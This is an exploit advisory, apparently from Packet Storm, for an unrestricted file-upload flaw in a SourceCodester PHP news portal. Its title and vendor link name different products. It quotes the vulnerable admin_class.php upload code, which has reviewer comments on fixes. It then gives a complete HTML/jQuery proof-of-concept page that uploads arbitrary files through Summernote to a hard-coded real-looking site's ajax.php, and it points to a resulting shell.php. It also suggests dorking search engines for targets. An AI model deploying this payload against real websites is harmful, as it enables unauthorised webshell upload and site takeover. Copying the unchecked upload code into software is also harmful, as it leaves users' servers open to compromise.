## https://sploitus.com/exploit?id=PACKETSTORM:180245
=============================================================================================================================================  
| # Title : Event Registration and Attendance System 1.0 wysiwyg code injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking in Google or other search engines.
  
[+] affected file : admin_class.php
  
// NOTE(review): fragment quoted from admin_class.php; $data and $content are defined
// outside the lines shown. $data appears to be a SQL SET clause assembled by string
// concatenation — confirm against the query that consumes it.
// htmlentities() plus the quote substitution (' -> ’) is output encoding standing in for a
// prepared statement; it is not a parameterised query.
$data .= ", content = '".htmlentities(str_replace("'","’",$content))."' ";
// The only precondition for accepting an upload is that a temp file exists.
if(!empty($_FILES['cover']['tmp_name'])){
// Stored name = current time (minute resolution) + the client-supplied original filename
// with spaces replaced by hyphens. No extension or MIME-type allowlist appears anywhere in
// these lines, so the file keeps whatever name and type the client chose.
// Hardening: generate the stored name server-side and allowlist image extensions/types
// after inspecting the content, not the client-declared name.
// NOTE(review): the PoC on this page targets ajax.php?action=save_image with a field named
// "file", not this "cover" field; whether that action shares this code path is not shown here.
$fname = strtotime(date("Y-m-d H:i"))."_".(str_replace(" ","-",$_FILES['cover']['name']));
// Destination is a directory under assets/ that the advisory's sample URL shows is served
// directly by the web server, so whatever is stored here is reachable over HTTP.
$move = move_uploaded_file($_FILES['cover']['tmp_name'],'../assets/uploads/content_images/'. $fname);
// Protocol/host/path are derived from request headers (HTTP_HOST is client-supplied) and
// are not used within the lines shown.
$protocol = strtolower(substr($_SERVER["SERVER_PROTOCOL"],0,5))=='https'?'https':'http';
$hostName = $_SERVER['HTTP_HOST'];
$path =explode('/',$_SERVER['PHP_SELF']);
$currentPath = '/'.$path[1];
if($move){
// $fname (derived from the client filename) is interpolated directly; the quote handling
// applied to $content above is not applied here.
$data .= ", cover_img='$fname' ";
}
}
  
[+] Line 27 : Set your target url.  
  
[+] This payload is WYSIWYG-based: the page can be edited remotely and a malicious executable file can be uploaded via Summernote, a WYSIWYG editor (v0.8.18).
  
  
[+] save payload as poc.html   
  
[+] payload :   
  
<!DOCTYPE html>
<!--
  Stand-alone copy of the application's "Manage About" admin form. It loads Summernote
  from public CDNs and, in the script further down, posts the editor's image uploads and
  the form itself to a hard-coded remote admin/ajax.php.
  NOTE(review): the page is meant to be opened locally, so every request it sends is
  cross-origin. jQuery does not attach cookies to cross-origin XHR unless withCredentials
  is set, and this page never sets it, so presumably the requests only succeed where the
  remote ajax.php actions accept them without an authenticated session. That missing
  server-side session check, together with the missing upload validation, is the fix.
-->
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Manage About Page</title>
<!-- Include Summernote CSS and jQuery -->
<link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
<link href="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.css" rel="stylesheet">
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.js"></script>
</head>
<body>
<div class="container mt-5">
<div class="col-lg-12">
<div class="card card-outline card-primary">
<div class="card-body">
<!-- action="" is never used: the submit handler in the script below intercepts the form
     with preventDefault() and sends it via AJAX instead. -->
<form action="" id="manage-about">
<div class="form-group">
<!-- This textarea is the "content" field carried by the save_about request; the seed
     paragraph is placeholder markup only. -->
<textarea name="content" id="content" cols="30" rows="10" class="summernote2 form-control">
<p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: 'Open Sans', Arial, sans-serif; font-size: 14px;">indoushka.</p>
</textarea>
</div>
</form>
</div>
<div class="card-footer border-top border-info">
<div class="d-flex w-100 justify-content-center align-items-center">
<!-- form="manage-about" ties this button to the form above even though it sits outside it. -->
<button class="btn btn-flat bg-gradient-primary mx-2" form="manage-about">Save</button>
</div>
</div>
</div>
</div>
</div>
  
<script>  
// Initialises the Summernote editor once the DOM is ready. The toolbar mirrors the
// application's own editor page; the behaviour that matters for this advisory is the
// onImageUpload callback, which hands every inserted picture to saveImg() instead of
// letting Summernote inline it as a data: URI.
$(document).ready(function(){
// Initialize Summernote Editor
$('.summernote2').summernote({
height: 300,
toolbar: [
['style', ['style']],
['font', ['bold', 'italic', 'underline', 'strikethrough', 'superscript', 'subscript', 'clear']],
['fontname', ['fontname']],
['fontsize', ['fontsize']],
['color', ['color']],
['para', ['ol', 'ul', 'paragraph', 'height']],
['table', ['table']],
['insert', ['link', 'picture']],
['view', ['undo', 'redo', 'fullscreen', 'codeview', 'help']]
],
callbacks: {
onImageUpload: function(files) {
saveImg(files[0]); // Handle image upload — only the first selected file is sent
}
}
});

// Function to save uploaded image
// Sends the picked file as the multipart/form-data field "file" to the remote
// ajax.php?action=save_image endpoint; contentType:false / processData:false let the
// browser set the multipart body and boundary itself.
// On a readable response the returned string is used verbatim as an <img src>, so the
// server's reply is trusted without any check. There is no error handler.
// NOTE(review): a multipart POST with no custom headers is a CORS "simple request": the
// browser sends it even when the server returns no CORS headers; only the success callback
// depends on them. For defenders, this POST (and its "file" field) is what to look for in
// access logs and what the server must gate behind an authenticated session and a
// file-type allowlist.
function saveImg(_file) {
var data = new FormData();
data.append("file", _file);
$.ajax({
data: data,
type: "POST",
url: "http://www.news.witnessradio.org/admin/ajax.php?action=save_image",
cache: false,
contentType: false,
processData: false,
success: function(resp) {
var image = $('<img>').attr('src', resp);
$('.summernote2').summernote("insertNode", image[0]);
}
});
}
});
  
// Form Submission
// Posts the whole form (the editor's HTML in the "content" field) to the remote
// ajax.php?action=save_about. `method` and `type` are both set to POST — jQuery treats
// them as aliases, so one is redundant. end_load() runs only when the response compares
// == 1 (loose equality, so the string "1" also matches); any other reply, or a failed
// request, leaves the loading state in place because there is no error handler.
$('#manage-about').submit(function(e) {
e.preventDefault();
start_load(); // Start a loading indicator (you need to define this function)
$.ajax({
url: 'http://www.news.witnessradio.org/admin/ajax.php?action=save_about',
data: new FormData($(this)[0]),
cache: false, // no effect on POST: jQuery only appends a cache-buster to GET/HEAD
contentType: false,
processData: false,
method: 'POST',
type: 'POST',
success: function(resp) {
if(resp == 1) {
alert_toast('Data successfully saved', "success");
end_load(); // End the loading indicator (you need to define this function)
}
}
});
});
  
// Optional: Define start_load and end_load functions  
/**
 * Placeholder for the application's loading-indicator start hook.
 * Intentionally a no-op on this stand-alone page; returns undefined.
 */
function start_load() {
    // no-op: nothing to show here
}
  
/**
 * Placeholder for the application's loading-indicator end hook.
 * Intentionally a no-op on this stand-alone page; returns undefined.
 */
function end_load() {
    // no-op: nothing to hide here
}
  
/**
 * Minimal stand-in for the application's toast helper: shows the message in a
 * blocking browser alert.
 * @param {string} message text to display
 * @param {string} type    severity label; accepted for call-site compatibility, unused
 */
function alert_toast(message, type) {
    window.alert(message);
}
</script>  
</body>  
</html>  
  
  
[+] path of evil : http://127.0.0.1/news_portal/assets/uploads/content_images/shell.php  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================